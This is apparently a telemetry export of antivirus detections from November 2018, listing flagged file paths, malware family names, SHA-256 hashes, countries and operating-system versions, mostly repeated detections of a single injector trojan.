  Row(detection=Row(filename='avscan-20181102-050758-3c6ed548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050758-3C6ED548', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055819-449a74ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055819-449A74BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000007b7', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp000007b7', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:46:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142410-cc1e916f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_87a8e257\\AVSCAN-20181102-142047-AB02305F\\AVSCAN-20181102-142410-CC1E916F', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183633-d6710781', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d921cee2\\AVSCAN-20181102-183612-D30C79DC\\AVSCAN-20181102-183633-D6710781', filesize=24192000, name='TR/Dldr.Megone.24185375.#M1.#R1'), hash='6ffc5fab6a631c07fa4727becfc59073926fd02bf3f94e8e603083b32b19ba13', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:36:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gbphysdb.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\GbPhysdb.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_cg.exe', filepath='\\\\?\\C:\\NIFPGA\\programs\\Xilinx14_7\\ISE\\bin\\nt\\_cg.exe', filesize=448000, name='W32/Sality.AT.#M1.#R1'), hash='655e782110cfd248aca4d614bab9123d17d0beb896818c60f4da79f086d8d40e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:58:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215510-49c4da9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-215510-49C4DA9A', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:55:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052239-494389cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052239-494389CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120457-5306637f', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-120428-4CFB2E10\\AVSCAN-20181102-120457-5306637F', filesize=192000, name='TR/Crypt.XPACK.4d0fc7.#M1.#R1'), hash='4d0fc7144beedb0620a8f17931a6969970ed17c42d65de92cf54157233c0cc5a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='souznprl.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\SOUZNprl.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051623-6931c253', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051623-6931C253', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060529-44dbad18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060529-44DBAD18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062110-75fbb019', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062110-75FBB019', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061824-12d5deb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061824-12D5DEB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060537-49f61338', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060537-49F61338', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051325-ff296530', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051325-FF296530', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055634-05f14684', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055634-05F14684', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060534-4844ec8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060534-4844EC8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053239-aecd1c75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053239-AECD1C75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055618-fc820758', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055618-FC820758', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054917-01e2a4e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054917-01E2A4E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051844-bd2066cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051844-BD2066CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051058-a75bfe1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051058-A75BFE1A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052724-f3187a82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052724-F3187A82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053528-13692fb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053528-13692FB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061053-06571f92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061053-06571F92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053523-10cce899', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053523-10CCE899', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051057-a68d1dcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051057-A68D1DCD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054723-be03a46d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054723-BE03A46D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053649-43f729f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053649-43F729F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052653-e0a4f026', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052653-E0A4F026', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062607-26da7647', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062607-26DA7647', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055110-45165cb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055110-45165CB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055319-91c044ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055319-91C044EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051959-ea2401a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051959-EA2401A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062126-7f9973dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062126-7F9973DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055841-52106918', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055841-52106918', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055500-ce30a154', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055500-CE30A154', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052557-bf803a2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052557-BF803A2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055720-216a15eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055720-216A15EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\fcmifq0lrj2\\Setup337.exe', filesize=1472000, name='TR/ATRAPS.Gen.#M300.#R3146'), hash='893c85fccbc3f765732cec327ed57514bd145a527ba72a42b6ebb2a5c963e853', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060746-96be469f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060746-96BE469F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050537-e83e122c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050537-E83E122C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055431-bce8660c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055431-BCE8660C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062210-99ebbe91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062210-99EBBE91', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060954-e3498c1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060954-E3498C1E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060752-9a633a3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060752-9A633A3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053745-65726105', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053745-65726105', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054449-61c127e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054449-61C127E0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061518-a3efd9c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061518-A3EFD9C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055841-523226fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055841-523226FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060043-9ae8d0f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060043-9AE8D0F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055957-7f7ceb4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055957-7F7CEB4F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:19:44Z'), dt=datetime.date(2018, 11, 2)),
